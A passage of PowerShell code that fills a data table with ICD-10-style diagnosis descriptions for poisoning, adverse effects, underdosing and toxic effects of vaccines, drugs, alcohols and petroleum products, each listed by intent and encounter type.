pertussis component, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, intentional self-harm","Poisoning by mixed bacterial vaccines without a pertussis component, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, intentional self-harm","Poisoning by mixed bacterial vaccines without a pertussis component, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, assault","Poisoning by mixed bacterial vaccines without a pertussis component, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, assault","Poisoning by mixed bacterial vaccines without a pertussis component, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, assault","Poisoning by mixed bacterial vaccines without a pertussis component, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, undetermined","Poisoning by mixed bacterial vaccines without a pertussis component, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, undetermined","Poisoning by mixed bacterial vaccines without a pertussis component, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, undetermined","Poisoning by mixed bacterial vaccines without a pertussis component, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of mixed bacterial vaccines without a pertussis component","Adverse effect of mixed bacterial vaccines without a pertussis component, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of mixed bacterial vaccines without a pertussis component","Adverse effect of mixed bacterial vaccines without a pertussis component, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of mixed bacterial vaccines without a pertussis component","Adverse effect of mixed bacterial vaccines without a pertussis component, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of mixed bacterial vaccines without a pertussis component","Underdosing of mixed bacterial vaccines without a pertussis component, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of mixed bacterial vaccines without a pertussis component","Underdosing of mixed bacterial vaccines without a pertussis component, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of mixed bacterial vaccines without a pertussis component","Underdosing of mixed bacterial vaccines without a pertussis component, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, accidental (unintentional)","Poisoning by other bacterial vaccines, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, accidental (unintentional)","Poisoning by other bacterial vaccines, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, accidental (unintentional)","Poisoning by other bacterial vaccines, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, intentional self-harm","Poisoning by other bacterial vaccines, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, intentional self-harm","Poisoning by other bacterial vaccines, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, intentional self-harm","Poisoning by other bacterial vaccines, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, assault","Poisoning by other bacterial vaccines, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, assault","Poisoning by other bacterial vaccines, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, assault","Poisoning by other bacterial vaccines, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, undetermined","Poisoning by other bacterial vaccines, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, undetermined","Poisoning by other bacterial vaccines, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other bacterial vaccines, undetermined","Poisoning by other bacterial vaccines, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other bacterial vaccines","Adverse effect of other bacterial vaccines, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other bacterial vaccines","Adverse effect of other bacterial vaccines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other bacterial vaccines","Adverse effect of other bacterial vaccines, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other bacterial vaccines","Underdosing of other bacterial vaccines, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other bacterial vaccines","Underdosing of other bacterial vaccines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other bacterial vaccines","Underdosing of other bacterial vaccines, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, accidental (unintentional)","Poisoning by smallpox vaccines, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, accidental (unintentional)","Poisoning by smallpox vaccines, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, accidental (unintentional)","Poisoning by smallpox vaccines, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, intentional self-harm","Poisoning by smallpox vaccines, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, intentional self-harm","Poisoning by smallpox vaccines, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, intentional self-harm","Poisoning by smallpox vaccines, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, assault","Poisoning by smallpox vaccines, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, assault","Poisoning by smallpox vaccines, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, assault","Poisoning by smallpox vaccines, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, undetermined","Poisoning by smallpox vaccines, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, undetermined","Poisoning by smallpox vaccines, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by smallpox vaccines, undetermined","Poisoning by smallpox vaccines, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of smallpox vaccines","Adverse effect of smallpox vaccines, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of smallpox vaccines","Adverse effect of smallpox vaccines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of smallpox vaccines","Adverse effect of smallpox vaccines, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of smallpox vaccines","Underdosing of smallpox vaccines, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of smallpox vaccines","Underdosing of smallpox vaccines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of smallpox vaccines","Underdosing of smallpox vaccines, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, accidental (unintentional)","Poisoning by other viral vaccines, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, accidental (unintentional)","Poisoning by other viral vaccines, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, accidental (unintentional)","Poisoning by other viral vaccines, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, intentional self-harm","Poisoning by other viral vaccines, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, intentional self-harm","Poisoning by other viral vaccines, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, intentional self-harm","Poisoning by other viral vaccines, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, assault","Poisoning by other viral vaccines, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, assault","Poisoning by other viral vaccines, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, assault","Poisoning by other viral vaccines, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, undetermined","Poisoning by other viral vaccines, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, undetermined","Poisoning by other viral vaccines, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other viral vaccines, undetermined","Poisoning by other viral vaccines, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other viral vaccines","Adverse effect of other viral vaccines, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other viral vaccines","Adverse effect of other viral vaccines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other viral vaccines","Adverse effect of other viral vaccines, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other viral vaccines","Underdosing of other viral vaccines, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other viral vaccines","Underdosing of other viral vaccines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other viral vaccines","Underdosing of other viral vaccines, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, accidental (unintentional)","Poisoning by immunoglobulin, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, accidental (unintentional)","Poisoning by immunoglobulin, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, accidental (unintentional)","Poisoning by immunoglobulin, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, intentional self-harm","Poisoning by immunoglobulin, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, intentional self-harm","Poisoning by immunoglobulin, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, intentional self-harm","Poisoning by immunoglobulin, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, assault","Poisoning by immunoglobulin, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, assault","Poisoning by immunoglobulin, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, assault","Poisoning by immunoglobulin, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, undetermined","Poisoning by immunoglobulin, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, undetermined","Poisoning by immunoglobulin, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by immunoglobulin, undetermined","Poisoning by immunoglobulin, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of immunoglobulin","Adverse effect of immunoglobulin, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of immunoglobulin","Adverse effect of immunoglobulin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of immunoglobulin","Adverse effect of immunoglobulin, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of immunoglobulin","Underdosing of immunoglobulin, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of immunoglobulin","Underdosing of immunoglobulin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of immunoglobulin","Underdosing of immunoglobulin, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, accidental (unintentional)","Poisoning by other vaccines and biological substances, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, accidental (unintentional)","Poisoning by other vaccines and biological substances, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, accidental (unintentional)","Poisoning by other vaccines and biological substances, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, intentional self-harm","Poisoning by other vaccines and biological substances, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, intentional self-harm","Poisoning by other vaccines and biological substances, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, intentional self-harm","Poisoning by other vaccines and biological substances, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, assault","Poisoning by other vaccines and biological substances, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, assault","Poisoning by other vaccines and biological substances, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, assault","Poisoning by other vaccines and biological substances, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, undetermined","Poisoning by other vaccines and biological substances, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, undetermined","Poisoning by other vaccines and biological substances, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other vaccines and biological substances, undetermined","Poisoning by other vaccines and biological substances, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other vaccines and biological substances","Adverse effect of other vaccines and biological substances, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other vaccines and biological substances","Adverse effect of other vaccines and biological substances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other vaccines and biological substances","Adverse effect of other vaccines and biological substances, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other vaccines and biological substances","Underdosing of other vaccines and biological substances, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other vaccines and biological substances","Underdosing of other vaccines and biological substances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other vaccines and biological substances","Underdosing of other vaccines and biological substances, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, accidental (unintentional)","Poisoning by unspecified drugs, medicaments and biological substances, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, accidental (unintentional)","Poisoning by unspecified drugs, medicaments and biological substances, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, accidental (unintentional)","Poisoning by unspecified drugs, medicaments and biological substances, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, intentional self-harm","Poisoning by unspecified drugs, medicaments and biological substances, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, intentional self-harm","Poisoning by unspecified drugs, medicaments and biological substances, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, intentional self-harm","Poisoning by unspecified drugs, medicaments and biological substances, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, assault","Poisoning by unspecified drugs, medicaments and biological substances, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, assault","Poisoning by unspecified drugs, medicaments and biological substances, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, assault","Poisoning by unspecified drugs, medicaments and biological substances, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, undetermined","Poisoning by unspecified drugs, medicaments and biological substances, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, undetermined","Poisoning by unspecified drugs, medicaments and biological substances, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs, medicaments and biological substances, undetermined","Poisoning by unspecified drugs, medicaments and biological substances, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs, medicaments and biological substances","Adverse effect of unspecified drugs, medicaments and biological substances, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs, medicaments and biological substances","Adverse effect of unspecified drugs, medicaments and biological substances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs, medicaments and biological substances","Adverse effect of unspecified drugs, medicaments and biological substances, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs, medicaments and biological substances","Underdosing of unspecified drugs, medicaments and biological substances, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs, medicaments and biological substances","Underdosing of unspecified drugs, medicaments and biological substances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs, medicaments and biological substances","Underdosing of unspecified drugs, medicaments and biological substances, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, accidental (unintentional)","Poisoning by other drugs, medicaments and biological substances, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, accidental (unintentional)","Poisoning by other drugs, medicaments and biological substances, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, accidental (unintentional)","Poisoning by other drugs, medicaments and biological substances, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, intentional self-harm","Poisoning by other drugs, medicaments and biological substances, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, intentional self-harm","Poisoning by other drugs, medicaments and biological substances, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, intentional self-harm","Poisoning by other drugs, medicaments and biological substances, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, assault","Poisoning by other drugs, medicaments and biological substances, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, assault","Poisoning by other drugs, medicaments and biological substances, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, assault","Poisoning by other drugs, medicaments and biological substances, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, undetermined","Poisoning by other drugs, medicaments and biological substances, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, undetermined","Poisoning by other drugs, medicaments and biological substances, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs, medicaments and biological substances, undetermined","Poisoning by other drugs, medicaments and biological substances, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drugs, medicaments and biological substances","Adverse effect of other drugs, medicaments and biological substances, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drugs, medicaments and biological substances","Adverse effect of other drugs, medicaments and biological substances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drugs, medicaments and biological substances","Adverse effect of other drugs, medicaments and biological substances, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other drugs, medicaments and biological substances","Underdosing of other drugs, medicaments and biological substances, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other drugs, medicaments and biological substances","Underdosing of other drugs, medicaments and biological substances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other drugs, medicaments and biological substances","Underdosing of other drugs, medicaments and biological substances, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, accidental (unintentional)","Toxic effect of ethanol, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, accidental (unintentional)","Toxic effect of ethanol, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, accidental (unintentional)","Toxic effect of ethanol, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, intentional self-harm","Toxic effect of ethanol, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, intentional self-harm","Toxic effect of ethanol, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, intentional self-harm","Toxic effect of ethanol, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, assault","Toxic effect of ethanol, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, assault","Toxic effect of ethanol, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, assault","Toxic effect of ethanol, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, undetermined","Toxic effect of ethanol, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, undetermined","Toxic effect of ethanol, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ethanol, undetermined","Toxic effect of ethanol, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, accidental (unintentional)","Toxic effect of methanol, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, accidental (unintentional)","Toxic effect of methanol, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, accidental (unintentional)","Toxic effect of methanol, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, intentional self-harm","Toxic effect of methanol, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, intentional self-harm","Toxic effect of methanol, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, intentional self-harm","Toxic effect of methanol, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, assault","Toxic effect of methanol, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, assault","Toxic effect of methanol, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, assault","Toxic effect of methanol, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, undetermined","Toxic effect of methanol, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, undetermined","Toxic effect of methanol, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of methanol, undetermined","Toxic effect of methanol, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, accidental (unintentional)","Toxic effect of 2-Propanol, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, accidental (unintentional)","Toxic effect of 2-Propanol, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, accidental (unintentional)","Toxic effect of 2-Propanol, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, intentional self-harm","Toxic effect of 2-Propanol, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, intentional self-harm","Toxic effect of 2-Propanol, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, intentional self-harm","Toxic effect of 2-Propanol, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, assault","Toxic effect of 2-Propanol, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, assault","Toxic effect of 2-Propanol, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, assault","Toxic effect of 2-Propanol, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, undetermined","Toxic effect of 2-Propanol, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, undetermined","Toxic effect of 2-Propanol, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of 2-Propanol, undetermined","Toxic effect of 2-Propanol, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, accidental (unintentional)","Toxic effect of fusel oil, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, accidental (unintentional)","Toxic effect of fusel oil, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, accidental (unintentional)","Toxic effect of fusel oil, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, intentional self-harm","Toxic effect of fusel oil, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, intentional self-harm","Toxic effect of fusel oil, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, intentional self-harm","Toxic effect of fusel oil, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, assault","Toxic effect of fusel oil, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, assault","Toxic effect of fusel oil, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, assault","Toxic effect of fusel oil, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, undetermined","Toxic effect of fusel oil, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, undetermined","Toxic effect of fusel oil, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fusel oil, undetermined","Toxic effect of fusel oil, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, accidental (unintentional)","Toxic effect of other alcohols, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, accidental (unintentional)","Toxic effect of other alcohols, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, accidental (unintentional)","Toxic effect of other alcohols, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, intentional self-harm","Toxic effect of other alcohols, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, intentional self-harm","Toxic effect of other alcohols, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, intentional self-harm","Toxic effect of other alcohols, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, assault","Toxic effect of other alcohols, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, assault","Toxic effect of other alcohols, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, assault","Toxic effect of other alcohols, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, undetermined","Toxic effect of other alcohols, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, undetermined","Toxic effect of other alcohols, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other alcohols, undetermined","Toxic effect of other alcohols, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, accidental (unintentional)","Toxic effect of unspecified alcohol, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, accidental (unintentional)","Toxic effect of unspecified alcohol, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, accidental (unintentional)","Toxic effect of unspecified alcohol, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, intentional self-harm","Toxic effect of unspecified alcohol, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, intentional self-harm","Toxic effect of unspecified alcohol, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, intentional self-harm","Toxic effect of unspecified alcohol, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, assault","Toxic effect of unspecified alcohol, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, assault","Toxic effect of unspecified alcohol, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, assault","Toxic effect of unspecified alcohol, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, undetermined","Toxic effect of unspecified alcohol, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, undetermined","Toxic effect of unspecified alcohol, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified alcohol, undetermined","Toxic effect of unspecified alcohol, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, accidental (unintentional)","Toxic effect of petroleum products, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, accidental (unintentional)","Toxic effect of petroleum products, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, accidental (unintentional)","Toxic effect of petroleum products, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, intentional self-harm","Toxic effect of petroleum products, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, intentional self-harm","Toxic effect of petroleum products, intentional self-harm, subsequent encounter") + $null = 